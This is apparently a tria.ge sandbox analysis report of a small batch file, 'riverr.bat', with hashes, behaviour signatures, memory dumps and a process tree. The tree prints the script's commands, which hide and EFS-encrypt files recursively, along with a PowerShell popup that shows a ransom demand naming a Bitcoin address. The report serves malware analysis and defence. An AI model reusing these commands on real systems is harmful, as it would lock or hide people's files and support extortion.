Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    126s
  • max time network
    137s
  • platform
    windows10-1703_x64
  • resource
    win10-20230915-en
  • resource tags

    arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system
  • submitted
    06/10/2023, 15:43

General

  • Target

    riverr.bat

  • Size

    1KB

  • MD5

    6f925a40f06c74f1a6f89ca3cebb5448

  • SHA1

    a298915d2cfa3ba7178142e2d391bc1ab4978f7a

  • SHA256

    19c3528c21b085b74d4f5d06f5665beb38d58ff9cd506153d8f158fa904b41ef

  • SHA512

    07a85184c83df3aa4fe8abdcf0c9d2fafa020aaf61d54e5f6a8d11fddf10f715cb778c56112d53f9c46538c8441387d906c2b35fe7c6341deacfc85b3ecaeaee

Score
1/10

Malware Config

Signatures

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs
  • Views/modifies file attributes 1 TTPs 8 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\riverr.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3748
    • C:\Windows\system32\attrib.exe
      attrib +h /s /d
      2⤵
      • Views/modifies file attributes
      PID:340
    • C:\Windows\system32\cipher.exe
      cipher /e /s /a
      2⤵
        PID:4460
      • C:\Windows\system32\attrib.exe
        attrib +h /s /d
        2⤵
        • Views/modifies file attributes
        PID:684
      • C:\Windows\system32\cipher.exe
        cipher /e /s /a
        2⤵
          PID:1908
        • C:\Windows\system32\attrib.exe
          attrib +h /s /d
          2⤵
          • Views/modifies file attributes
          PID:4636
        • C:\Windows\system32\cipher.exe
          cipher /e /s /a
          2⤵
            PID:4148
          • C:\Windows\system32\attrib.exe
            attrib +h /s /d
            2⤵
            • Views/modifies file attributes
            PID:1052
          • C:\Windows\system32\cipher.exe
            cipher /e /s /a
            2⤵
              PID:4628
            • C:\Windows\system32\attrib.exe
              attrib +h /s /d
              2⤵
              • Views/modifies file attributes
              PID:3256
            • C:\Windows\system32\cipher.exe
              cipher /e /s /a
              2⤵
                PID:5036
              • C:\Windows\system32\attrib.exe
                attrib +h /s /d
                2⤵
                • Views/modifies file attributes
                PID:68
              • C:\Windows\system32\cipher.exe
                cipher /e /s /a
                2⤵
                  PID:2508
                • C:\Windows\system32\attrib.exe
                  attrib +h /s /d
                  2⤵
                  • Views/modifies file attributes
                  PID:3940
                • C:\Windows\system32\cipher.exe
                  cipher /e /s /a
                  2⤵
                    PID:2424
                  • C:\Windows\system32\attrib.exe
                    attrib +h /s /d
                    2⤵
                    • Views/modifies file attributes
                    PID:2680
                  • C:\Windows\system32\cipher.exe
                    cipher /e /s /a
                    2⤵
                      PID:2400
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -command "$wshell = New-Object -ComObject WScript.Shell; $wshell.Popup('Your files have been encrypted! To get them back, pay $300 to the following Bitcoin address: 3BKuiDHNSbdCdK8fHTUxCB4GRBiuKUrMzr...', 0, 'Cap or Fact', 16)"
                      2⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3360
                    • C:\Windows\system32\tasklist.exe
                      tasklist
                      2⤵
                      • Enumerates processes with tasklist
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3364
                    • C:\Windows\system32\find.exe
                      find /i "Ransomware"
                      2⤵
                        PID:3952
                      • C:\Windows\system32\notepad.exe
                        notepad "C:\Users\Admin\Downloads\do not close.txt"
                        2⤵
                          PID:1480

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ac3v03la.zie.ps1

                        Filesize

                        1B

                        MD5

                        c4ca4238a0b923820dcc509a6f75849b

                        SHA1

                        356a192b7913b04c54574d18c28d46e6395428ab

                        SHA256

                        6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                        SHA512

                        4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                      • C:\Users\Admin\Downloads\do not close.txt

                        Filesize

                        111B

                        MD5

                        31a135982c340ddee33732d381694b3c

                        SHA1

                        4b7a551ae6507f2ed1fd6601d35d9e36915fef3b

                        SHA256

                        71b2cc62a02aee920d4984caf0fdb26fc32b14190d3bac9b0f88fe696708449c

                        SHA512

                        82344bca5b4ed3eb5eacfb2c79ffc8f799db5daa10e5cb4b89675bca4f251fcd933dd4e2319d11b3456cee08102e5bf5ce0a878a6296fe548ef2ae148287dcf7

                      • memory/3360-6-0x0000019F760D0000-0x0000019F760F2000-memory.dmp

                        Filesize

                        136KB

                      • memory/3360-9-0x00007FF9A4730000-0x00007FF9A511C000-memory.dmp

                        Filesize

                        9.9MB

                      • memory/3360-11-0x0000019F758D0000-0x0000019F758E0000-memory.dmp

                        Filesize

                        64KB

                      • memory/3360-10-0x0000019F758D0000-0x0000019F758E0000-memory.dmp

                        Filesize

                        64KB

                      • memory/3360-12-0x0000019F76200000-0x0000019F76276000-memory.dmp

                        Filesize

                        472KB

                      • memory/3360-27-0x0000019F758D0000-0x0000019F758E0000-memory.dmp

                        Filesize

                        64KB

                      • memory/3360-31-0x00007FF9A4730000-0x00007FF9A511C000-memory.dmp

                        Filesize

                        9.9MB